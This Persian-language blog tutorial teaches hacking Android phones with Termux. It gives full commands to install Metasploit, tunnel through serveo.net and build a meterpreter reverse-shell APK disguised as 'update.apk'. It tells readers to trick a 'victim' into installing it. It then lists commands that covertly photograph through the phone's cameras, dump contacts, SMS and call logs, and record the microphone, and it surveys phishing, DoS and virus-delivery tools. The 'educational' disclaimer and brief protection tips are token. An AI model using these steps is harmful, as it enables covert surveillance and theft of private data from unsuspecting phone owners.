دستگاه های اندرویدی به طور گسترده در سراسر جهان استفاده می شوند. برنامه ها این پلتفرم را توسط میلیون ها کاربر بهتر اجرا می کنند. هکرها برای آسیب رساندن به کاربران و سرقت اطلاعات شخصی، گوشی های هوشمند را هک می کنند. بنابراین، در این مقاله، شما می خواهید یاد بگیرید که چگونه هکرها دستگاه های اندرویدی را هک می کنند و چگونه می توانید هک اندروید را انجام دهید. پس اگر می خواهید هک گوشی با ترموکس را یاد بگیرید با ما همراه باشید.

هک گوشی با ترموکس

در این راهنما، اطلاعات کاملی در مورد نحوه هک کردن دستگاه های اندرویدی و نحوه هک کردن گوشی های اندرویدی توسط هکرها گفته شده. همچنین نکاتی در مورد نحوه محافظت از خود در برابر این نوع هک را به شما یاد خواهم داد. در این راهنما، من قصد دارم از ترموکس ( Termux ) استفاده کنم.

توجه: این فقط برای اهداف آموزشی است از آن برای استفاده غیرقانونی استفاده نکنید. اگر هر کسی که از اطلاعات این وب سایت به دلیل نقض قانون سوء استفاده می کند، اتهامات جنایی مطرح شود، تیم Tricky Worlds مسئولیتی نخواهد داشت.

برنامه Termux چیست؟

Termux شبیه سازی ترمینال قدرتمند را با مجموعه گسترده بسته های لینوکس ترکیب می کند. دستورات مورد استفاده در برنامه Termux. Termux یک شبیه ساز ترمینال اندروید است. که بدون نیاز به روت یا تنظیمات مورد نیاز کار می کند و دسترسی ترمینال بسیار خوبی به اندروید و هک هر دستگاه اندرویدی دارد.

 

پس از این، می توانید تلفن هک شده را با استفاده از Metasploit در termux مشاهده کنید.

وضعیت باتری
صندوق ورودی پیامک خوانده شد
ارسال اس ام اس
اطلاعات دستگاه تلفن
نان تست
موتور TTS در اندروید
TTS Speak
تلفن را ویبره کنید
اطلاعات اتصال وای فای
اطلاعات اسکن Wi-Fi
اطلاعات دوربین
عکس دوربین
کلیپ بورد Ge
مجموعه کلیپ بورد
لیست مخاطبین

دانلود فایل با دانلود منیجر اندروید
موقعیت مکانی از طریق GPS، شبکه تلفن همراه یا Wi-Fi
اطلاع
URL را باز کنید
اشتراک گذاری فایل با اکشن های اندروید

الزامات :

اندروید 5.0 و بالاتر
برنامه اندروید Termux. آن را از زیر دانلود کنید.

دانلود ترموکس

من نحوه نصب Metasploit را در Termux در زیر به شما نشان خواهم داد. Termux باید اجازه ذخیره سازی خارجی داشته باشد. برای این فقط این دستور را یکباره وارد کنید:

“Termux-setup-storage”

مرحله 1: برای هک دستگاه اندروید فریم ورک Metasploit را در Termux نصب کنید

1. اول از همه، Termux را در دستگاه اندرویدی خود نصب کنید، پیوندها در بالا آورده شده است.

2. پس از آن، برنامه را باز کنید و منتظر بمانید تا چند فایل نصب شود.

3. حالا این دستور را وارد کنید.

apt update $ apt upgrade

4. سپس این متن را وارد یا کپی کنید

apt install curl

5. این را وارد یا کپی کنید

curl -LO https://raw.githubusercontent.com/Hax4us /Metasploit_termux/master/metasploit.sh

6. حالا با دادن این دستور اجازه بدهید.

chmod +x metasploit.sh

7. حالا Next، Go With this command.

./metasploit.sh

8. و اکنون صبر کنید تا پردازش و دانلود کامل شود. بسته به سرعت اینترنت می تواند تا 40 دقیقه طول بکشد

9. اکنون فریم ورک Metasploit را با موفقیت نصب کرده اید.

هک دستگاه اندرویدی

همچنین، نحوه تغییر مک آدرس دستگاه اندروید و ویندوز خود را بخوانید

مرحله 2: ارسال پورت

1. Termux را باز کنید و دستور زیر را تایپ کنید. ssh باز را با موفقیت نصب می کند

pkg install Openssh

2. پس از آن دستور زیر را تایپ کنید تا جلسه شما شروع شود.

ssh -R 80:localhost:3000 serveo.net

3. اکنون جلسه بالاخره شروع شده است.

مرحله 3: ایجاد فایل Apk با بارگذاری تعبیه شده

1. ابتدا دستور زیر را تایپ کنید تا یک اپلیکیشن payload دریافت کنید

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=3000 R > storage/download/update.apk

2. یک دقیقه صبر کنید و برنامه payload را با موفقیت ایجاد کنید.

اکنون مرحله مهم برنامه را برای قربانی یا دوست خود ارسال کنید و آنها را تشویق کنید تا این برنامه را نصب کنند.

مرحله 4: Metasploit را در Termux راه اندازی کنید

1. با وارد کردن این دستور در جلسه جدید فریم ورک Metasploit را در Termux فعال کنید

msfconsole

2. حالا این دستور را یکی یکی تایپ کنید تا هر دستگاه اندرویدی را هک کنید

1. use exploit/multi/handler
2. set payload android/meterpreter/reverse_tcp
3. Then type this, set LHOST localhost
4. set LPORT 3000
5. exploit -j -z

 

3. تبریک……شما با موفقیت گوشی را هک کردید!

 

نحوه دریافت جزئیات از تلفن قربانی:

1. برای مشاهده لیست دستورات قابل استفاده کافیست یک علامت سوال (؟) وارد کنید و اینتر را بزنید یا کلمات زیر را از تصویر زیر تایپ کنید.

بنابراین، شما کنترل دسترسی کامل به موبایل قربانی خود دارید. می‌توانید دستور {meterpreter> help} را برای تمام توانایی‌های ممکن برای هک کردن، وارد کنید. اما من این کار را برای شما انجام خواهم داد، می توانید از دستورات زیر برای هک کردن هر دستگاه اندرویدی استفاده کنید

همچنین، نحوه هک کردن هر بازی اندروید را با این آخرین برنامه ها بخوانید

1. کنترل دوربین قربانی ( هک دوربین گوشی )

اولا،
برای گرفتن عکس از دوربین جلوی گوشی قربانی فقط این دستور را تایپ کنید:

webcam_snap -i 2 -p storage/downloads/Snapshot-F.jpg

ثانیاً

اگر می خواهید به دوربین پشتی گوشی دسترسی داشته باشید به دستور زیر توجه کنید

 

webcam_snap -i 1 -p storage/downloads/Snapshot-F.jpg

می‌توانید گالری یا فایل منیجر خود را (به طور پیش‌فرض در پوشه دانلود) بررسی کنید تا تصویر گرفته شده توسط تلفن قربانی خود را ببینید.

2. دریافت همه مخاطبین از تلفن قربانی

برای دسترسی به مخاطبین از تلفن قربانی خود فقط این دستور را تایپ کنید:

dump_contacts -o storage/downloads/Contacts.txt

لیستی از مخاطبین در پوشه دانلود شما یعنی Contacts.txt ذخیره می شود.

3. برای دسترسی به پیامک از تلفن قربانی

برای خواندن تمام پیامک ها از تلفن قربانی درست مانند بالا این دستور را تایپ کنید:

dump_sms -o storage/downloads/SMS.txt

همه پیام ها به طور پیش فرض در پوشه دانلودهای شما یعنی SMS.txt ذخیره می شوند

4. واکشی گزارش تماس

برای دریافت جزئیات گزارش تماس تلفن Android قربانی خود

dump_calllog -o storage/downloads/CallLog.txt

تمام جزئیات گزارش تماس به طور پیش‌فرض در پوشه دانلودهای شما یعنی CallLog.txt ذخیره می‌شود.

5. استفاده از میکروفون تلفن قربانی

همچنین می‌توانید صدا را در تلفن قربانی ضبط کنید و در تلفن خود به آن گوش دهید. فقط این دستور را تایپ کنید:-

record_mic -d 10 -f storage/downloads/Spy-Record.mp3

این دستور به طور پیش فرض 10 ثانیه صدا را ضبط می کند.
شما می توانید مدت زمان ضبط را با جایگزینی 10 با نقطه دلخواه، 20 برای ضبط 20 ثانیه و غیره افزایش دهید.

15 ابزار مهم برای هک گوشی با ترموکس

1. Metasploit Framework

Metasploit چیزی بیش از یک ابزار Termux است. این مجموعه ای از ابزارهای بهره برداری است. من Metasploit را پایه ای می نامم که می توانید برای ایجاد ابزارهای خود از آن استفاده کنید. این ابزار رایگان یکی از محبوب ترین ابزارهای امنیت اطلاعات است که به شما امکان می دهد آسیب پذیری ها را در پلتفرم های مختلف پیدا کنید. Metasploit از بیش از 200000 کاربر و کارمند پشتیبانی می کند تا به شما کمک کند اطلاعات مورد نیاز خود را دریافت کنید و آسیب پذیری های سیستم خود را شناسایی کنید. این جعبه ابزار هک به شما این امکان را می دهد که حملات هکرها را برای شناسایی آسیب پذیری ها شبیه سازی کنید. Metasploit در تمام پلتفرم های اصلی موجود است. همچنین می توانید Metasploit را در Termux نصب کنید.

2. Nmap

Nmap (نقشه شبکه) یک ابزار امنیتی است که برای کشف میزبان ها و سرویس ها در یک شبکه کامپیوتری استفاده می شود و می توان از آن برای ترسیم نقشه شبکه ها و شناسایی هاست ها و دستگاه های متصل به آنها استفاده کرد. این یک ابزار خط فرمان است و برای سیستم عامل های مختلف از جمله اندروید از طریق Termux در دسترس است. می توان از آن برای انجام کارهای مختلفی مانند کشف شبکه، اسکن پورت و تشخیص نسخه و غیره استفاده کرد. با nmap در Termux، کاربران می‌توانند شناسایی شبکه و ارزیابی‌های امنیتی را بر روی دستگاه‌های اندرویدی خود انجام دهند که آن را به ابزاری قدرتمند برای مدیران شبکه و متخصصان امنیتی تبدیل می‌کند.

3. Wireshark

Wireshark برای Termux نسخه ای از ابزار محبوب تحلیلگر بسته است که برای اجرا در سیستم عامل اندروید از طریق برنامه شبیه ساز ترمینال Termux پورت شده است. این به کاربران اجازه می‌دهد تا ترافیک شبکه را در دستگاه‌های اندرویدی خود مانند نسخه دسکتاپ Wireshark ضبط، تجزیه و تحلیل و بررسی کنند. می توان از آن برای عیب یابی شبکه، تجزیه و تحلیل پروتکل، و ارزیابی های امنیتی و سایر وظایف استفاده کرد. با Wireshark در Termux، مدیران شبکه و متخصصان امنیتی می توانند قدرت یک تحلیلگر بسته با امکانات کامل را در دستگاه های تلفن همراه خود داشته باشند و ترافیک شبکه را در حال حرکت تجزیه و تحلیل کنند.

4 SQLMAP

sqlmap یک ابزار خط فرمان منبع باز است که فرآیند شناسایی و بهره برداری از آسیب پذیری های تزریق SQL را خودکار می کند. می توان از آن برای تست نفوذ و ارزیابی های امنیتی برای کشف و بهره برداری از آسیب پذیری های تزریق SQL در برنامه های کاربردی وب استفاده کرد. SQLMap برای Termux نسخه ای از ابزار است که برای اجرا در سیستم عامل اندروید از طریق برنامه شبیه ساز ترمینال Termux پورت شده است. با SQLMap در Termux، متخصصان امنیتی و تسترهای نفوذ می‌توانند حملات تزریق SQL را انجام دهند و داده‌های حساس را از پایگاه‌های داده در دستگاه‌های تلفن همراه خود استخراج کنند.

5. جعبه ابزار مهندسی اجتماعی

جعبه ابزار مهندسی اجتماعی (SET) چارچوبی برای ساخت و اجرای حملات مهندسی اجتماعی است. این ابزاری است که می تواند توسط آزمایش کنندگان نفوذ و محققان امنیتی برای ارزیابی امنیت عنصر انسانی یک سازمان، که به عنوان کاربران نهایی آن نیز شناخته می شود، مورد استفاده قرار گیرد. SET for Termux نسخه ای از ابزار است که برای اجرا در سیستم عامل اندروید از طریق برنامه شبیه ساز ترمینال Termux پورت شده است. با SET در Termux، متخصصان امنیتی و آزمایش‌کنندگان نفوذ می‌توانند حملات مهندسی اجتماعی مختلفی مانند فیشینگ و ارسال انبوه را در دستگاه‌های تلفن همراه خود انجام دهند.

6. نیکتو

Nikto یک اسکنر وب سرور منبع باز است که هک گوشی با ترموکس را ساده تر می کند. که می تواند برای شناسایی آسیب پذیری ها در وب سرورها و برنامه های کاربردی وب استفاده شود. می توان از آن برای انجام کارهای مختلفی مانند بررسی نسخه های نرم افزار قدیمی، جستجوی آسیب پذیری های شناخته شده و شناسایی فایل ها و اسکریپت های پیش فرض استفاده کرد.

Nikto for Termux نسخه ای از ابزاری است که برای اجرا در سیستم عامل اندروید از طریق اپلیکیشن شبیه ساز ترمینال Termux پورت شده است. با Nikto در Termux، متخصصان امنیتی و آزمایش‌کنندگان نفوذ می‌توانند ارزیابی‌های آسیب‌پذیری وب سرور و برنامه‌های وب را بر روی دستگاه‌های تلفن همراه خود انجام دهند، که آن را به ابزاری قدرتمند برای تست امنیت و تست نفوذ در حال حرکت تبدیل می‌کند.

7. ابزار-X

Tool-X یکی از بهترین ابزارهای هک است که مخصوص Termux طراحی شده است. با کمک Tool-X می توانید به راحتی و تنها با یک کلیک بیش از 371 ابزار هک را برای Termux نصب کنید. قبل از اختراع این ابزار، باید ابزارهای لازم هک Termux را یکی یکی با جستجو در GitHub یا وب سایت دیگری نصب کنیم. اکنون فقط باید یک ابزار به نام Tool-X را نصب کنید. این ابزار فهرستی از تمام ابزارهای لازم هک Termux را دارد. پس از نصب Tool-X در Termux خود، می توانید به راحتی ابزارهای هک مورد علاقه خود را تنها با یک کلیک نصب کنید.

8. Fsociety Toolkit

Fsociety یک ابزار هک برای کاربران Termux در اندروید است. این مجموعه ای از تست های نفوذ، ابزارهای بهره برداری و اسکریپت های مختلف است که می تواند برای اهداف هک اخلاقی استفاده شود. مجموعه ای از ابزارها را برای جمع آوری اطلاعات، اسکن آسیب پذیری، تست بی سیم، تست استرس، شکستن رمز عبور و غیره فراهم می کند.

این به کاربران Termux اجازه می دهد تا شبکه ها، وب سایت ها و شبکه های بی سیم را آزمایش کنند و حملات سایبری را به شیوه ای اخلاقی شبیه سازی کنند. این ابزار به صورت دوره ای با ویژگی ها و ابزارهای جدید توسط توسعه دهندگان به روز می شود. جعبه ابزار Fsociety شامل تمام ابزارهای هک Termux است که در سری Mr.Robot ظاهر شدند.

9. هیدرا

Hydra ابزاری برای شکستن رمز عبور است که می تواند برای انجام کارهای مختلف مانند حملات آنلاین رمز عبور به پروتکل های مختلف استفاده شود. این یک ابزار خط فرمان است و از پروتکل های مختلفی مانند ftp، telnet، pop3، http، smb، smtp و غیره پشتیبانی می کند. Hydra for Termux نسخه ای از ابزار است که برای اجرا در سیستم عامل اندروید از طریق ترمینال Termux پورت شده است. برنامه شبیه ساز با Hydra در Termux، متخصصان امنیتی و آزمایش‌کنندگان نفوذ می‌توانند حملات شکستن رمز عبور آنلاین را بر روی دستگاه‌های تلفن همراه خود انجام دهند، که آن را به ابزاری قدرتمند برای تست امنیت و تست نفوذ در حال حرکت تبدیل می‌کند.

10. Slowloris

Slowloris یک برنامه هک Dos با پهنای باند کم است. این ابزار با استفاده از زبان برنامه نویسی پایتون برنامه ریزی شده است. یک حمله HTTP Denial of Service را انجام می دهد که سرعت سرورهای کوچک را کند یا خراب می کند. همچنین می توانید از این ابزار برای انجام حمله Dos در وب سایت استفاده کنید. این ابزار درخواست های HTTP زیادی ایجاد می کند و هدرها را به صورت دوره ای برای باز نگه داشتن اتصال ارسال می کند. این ابزار هرگز اتصال را نمی بندد مگر اینکه سرور این کار را انجام دهد. همانطور که سرور اتصال را می بندد، Slowloris یک اتصال جدید به سرور ایجاد کرد. در نتیجه سرور از کار می افتد یا پاسخ نمی دهد.

11. Zphisher

Zphisher یکی از بهترین ابزارهای هک برای Termux است. اگر به دنبال ابزار Termux هستید که برای فیشینگ محبوب باشد، Zphisher می تواند بهترین ابزار برای شما باشد. این یک نسخه پیشرفته از کیت ابزار فیشینگ و یک نسخه ارتقا یافته از Shell Phish است. در داخل Zphisher، گزینه تونل زنی را از 4 ابزار Ngrok، Localhost، Serveo.net و HTTP://localhost.run دریافت خواهید کرد. Zphisher دارای بیش از 30 صفحه فیشینگ در رسانه های اجتماعی است و هر صفحه در شرایط کار قرار دارد.

12. IP Tracer

اگر به دنبال ابزار Termux هستید که بتواند آدرس IP قربانی را ردیابی کند. IP tracer بهترین ابزار Termux برای شما خواهد بود. IP Tracer از IP-API برای ردیابی آدرس IP کاربر استفاده می کند. هزاران کاربر Termux از این ابزار استفاده می کنند. IP Tracer برای Termux در دسترس است، بنابراین شما به راحتی می توانید IP هر کسی را با استفاده از این ابزار Termux ردیابی کنید. حال بیایید ببینیم چگونه این ابزار را در Termux خود نصب کنیم.

13. EasyY_HaCk

 

EasY_HaCk یکی از بهترین ابزارها برای Termux است. این ابزاری برای اسکن شبکه، جمع آوری اطلاعات و بهره برداری از تلفن های اندرویدی و رایانه های شخصی ویندوز است. این ابزار عمدتاً برای اهداف تست نفوذ است. این شامل ابزارهای محبوبی مانند Metasploit Framework، SQLmap، nmap، Metagoofil، RED HAWK، recon-ng و ابزارهای تست قدرتمندتر است. در ابتدا، می‌توانید از این ابزار برای انجام کارهایی مانند Payload Generation، Metasploit-Framework، نصب Beef-Framework، نصب NGROK و غیره استفاده کنید.

14. seeker

جستجوگر ابزاری است که برای یافتن مکان دقیق شخص از راه دور استفاده می شود. Seeker به شما اجازه می دهد تا یک وب سایت را روی یک سرور PHP میزبانی کنید. از Serveo.net یا Ngrok برای ایجاد پیوند استفاده می کند. می توانید لینک تولید شده را به هدف ارسال کنید. همانطور که هدف وب سایت را باز می کند، اجازه مکان را می خواهد و اگر هدف اجازه دهد. می‌توانیم مکان دقیق هدف را همراه با جهت در نقشه‌های گوگل به دست آوریم. برای اطلاع از مکان دقیق شخص می توانید از Seeker در Termux استفاده کنید. حال بیایید ببینیم که چگونه این ابزار را روی Termux نصب کنیم.

15. Infect

Infect یک بسته Termux است که به شما امکان ایجاد و ارسال ویروس به هر دستگاه اندرویدی را می دهد. از طریق لینک می توانید ویروس ها را تحویل دهید. همچنین می توانید با انتخاب گزینه “save now” در Termux خود، یک دستگاه اندرویدی آلوده را از ویروس ها نجات دهید.

چگونه می توانید از خود محافظت کنید؟

فقط برنامه ها و نرم افزارها را از فروشگاه google play نصب کنید.
مطمئن شوید که مجبور نیستید نصب از منابع ناشناس را فعال کنید.
گوشی خود را همیشه همراه خود داشته باشید.
از باز کردن پیوندهای مشکوک در ایمیل ها یا پیام ها خودداری کنید زیرا می تواند هر دستگاه اندرویدی را هک کند.

نتیجه

بنابراین، در این مقاله، من تمام روش ها و اطلاعاتی را که شما در جستجوی آن هستید برای هک گوش با ترموکس آورده شده. اگر در مورد این مقاله سؤالی دارید، هر گونه بازخورد یا ایده ای دارید اگر می خواهید نظرات خود را به اشتراک بگذارید. دقت داشته باشید که هک گوشی با ترموکس به شما کمک می کند که راحت به اطلاعات دسترسی داشته باشید. اما باید بدانید که این مسئله غیر قانونی است. به هیچ عنوان حتی برای شوخی کردن با افراد نباید این کار را انجام دهید. هک کردن در ایران فقط برای فرزندان زیر 18 سال شما غیر قانونی تلقی نمی شود!.